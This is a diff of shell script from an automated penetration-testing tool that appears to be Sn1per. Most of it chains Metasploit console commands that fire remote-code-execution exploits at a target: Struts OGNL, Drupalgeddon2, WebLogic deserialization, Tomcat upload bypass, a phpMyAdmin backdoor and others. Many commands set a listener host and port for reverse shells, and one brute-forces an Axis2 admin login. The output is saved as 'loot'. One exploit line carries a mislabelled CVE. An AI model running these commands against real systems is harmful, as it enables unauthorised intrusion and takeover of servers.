msfconsole -q -x "use scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING AXIS2 ADMIN BRUTE FORCE SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/axis_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg USERNAME admin; setg PASS_FILE "$PASS_FILE"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING AXIS2 AUTHENTICATED DEPLOYER RCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use multi/http/axis2_deployer; setg RHOSTS "$TARGET"; set FingerprintCheck false; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING DRUPAL REST UNSERIALIZE CVE-2019-6340 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use unix/webapp/drupal_restws_unserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JAVA RMI SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/scanner/misc/java_rmi_server; setg RHOSTS \"$TARGET\"; set RPORT \"$PORT\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -4,7 +4,7 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $LOOT_DIR 2> /dev/null
|
||||
mkdir $LOOT_DIR/domains 2> /dev/null
|
||||
mkdir $LOOT_DIR/screenshots 2> /dev/null
|
||||
|
|
@ -16,6 +16,7 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
fi
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-webporthttp.txt
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
|
|
@ -66,67 +67,68 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
echo -e " \"' '\" "
|
||||
echo -e " ''''$RESET"
|
||||
echo ""
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -sV -Pn -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-http-$TARGET.xml
|
||||
port_http=`grep 'portid="'$PORT'"' $LOOT_DIR/nmap/nmap-http-$TARGET.xml | grep open`
|
||||
if [ -z "$port_http" ]; then
|
||||
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
|
||||
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
